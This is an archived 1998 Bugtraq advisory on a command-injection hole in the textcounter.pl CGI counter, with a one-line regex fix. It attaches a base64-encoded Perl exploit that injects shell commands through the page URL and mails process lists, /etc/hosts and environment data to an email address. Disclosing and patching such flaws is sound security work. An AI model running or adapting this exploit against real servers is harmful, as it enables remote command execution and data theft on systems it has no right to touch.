Home page logo
/

bugtraq logo Bugtraq mailing list archives

textcounter.pl SECURITY HOLE
From: pdoru () kappa ro (Doru Petrescu)
Date: Wed, 24 Jun 1998 08:51:11 +0300


  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime () docserver cac washington edu for more info.

---490663578-807079570-898667471=:9579
Content-Type: TEXT/PLAIN; charset=US-ASCII

             Hi,

   I've found a serious problem in textcounter.pl script that enable
everybody to execute commands on your system with the same rights as the
httpd daemon.
   Program was created by Matt Wright (mattw () worldwidemart com) and
has a "Last Modified Date" at 5/10/96. You can find it at
http://www.worldwidemart.com/scripts/.

   The counter use the enviroment variable DOCUMENT_URI to
create/read/update a file where it keeps the hit count. There is NO test
for shell metacharacters, so you can easily put something evil, that will
make PERL to execute it ...
   This is the two lines responsible with the problem ...

   if (-e "$data_dir$count_page") {
      open(COUNT,"$data_dir$count_page");
    ....
   }

   Because of the test condition, the attack have to be repeated twice to
succeed. First time the condition is false and the tricky file gets
created, and the second time, the condition is true and our commands get
executed ... Nice isn't it ? :(

   The fix is very simple: add after line 91, another line that will make
sure that there is NO tricky characters in the filename.

$count_page = "$ENV{'DOCUMENT_URI'}";         # the original 91 line ....
$count_page =~ s/([^a-z0-9])/sprintf("%%%02X",$1)/ge;   # ADD THIS !!!!!


    If you want to make sure that your system is vulnerable or not, you
can use the small program that it's attached. No cracking please ...


Best regards,
------
Doru Petrescu
KappaNet - Software Engineer
E-mail: pdoru () kappa ro

---490663578-807079570-898667471=:9579
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="cnt-exploit.pl"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.3.96.980624085111.9579B () pop3 kappa ro>
Content-Description: counter.pl exploit

IyEvdXNyL2Jpbi9wZXJsDQoNCiRVUkw9J2h0dHA6Ly9kdHAua2FwcGEucm8v
YS90ZXN0LnNodG1sJzsgICAgIyBwbGVhc2UgX0RPXyBfbW9kaWZ5XyB0aGlz
IA0KJEVNQUlMPSdwZG9ydUBwb3AzLmthcHBhLnJvLHJvb3QnOyAgIAkgICAg
IyBwbGVhc2UgX0RPXyBfbW9kaWZ5XyB0aGlzDQoNCg0KaWYgKCRBUkdWWzBd
KSB7DQogICAkQ01EPSRBUkdWWzBdOw0KfWVsc2V7DQogICAkQ01EPSIocHMg
YXg7Y2QgLi47Y2QgLi47Y2QgLi47Y2QgZXRjO2NhdCBob3N0cztzZXQpXHxt
YWlsICR7RU1BSUx9IC1zYW5vdGhlcmVfb25lIjsNCn0NCg0KJHRleHQ9IiR7
VVJMfS87SUZTPVw4OyR7Q01EfTtlY2hvfCI7DQokdGV4dCA9fiBzLyAvXCRc
e0lGU1x9L2c7DQoNCiNwcmludCAiJHRleHRcbiI7DQoNCnN5c3RlbSh7Indn
ZXQifSAid2dldCIsICR0ZXh0LCAiLU8vZGV2L251bGwiKTsNCnN5c3RlbSh7
IndnZXQifSAid2dldCIsICR0ZXh0LCAiLU8vZGV2L251bGwiKTsNCiNzeXN0
ZW0oeyJseW54In0gImx5bngiLCAkdGV4dCk7IA0KI3N5c3RlbSh7Imx5bngi
fSAibHlueCIsICR0ZXh0KTsgICAgICMgaWYgeW91IGRvbid0IGhhdmUgIndn
ZXQiDQoJCQkJICAjIHlvdSBjYW4gdHJ5IHdpdGggIkx5bngiDQoNCg==
---490663578-807079570-898667471=:9579--



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault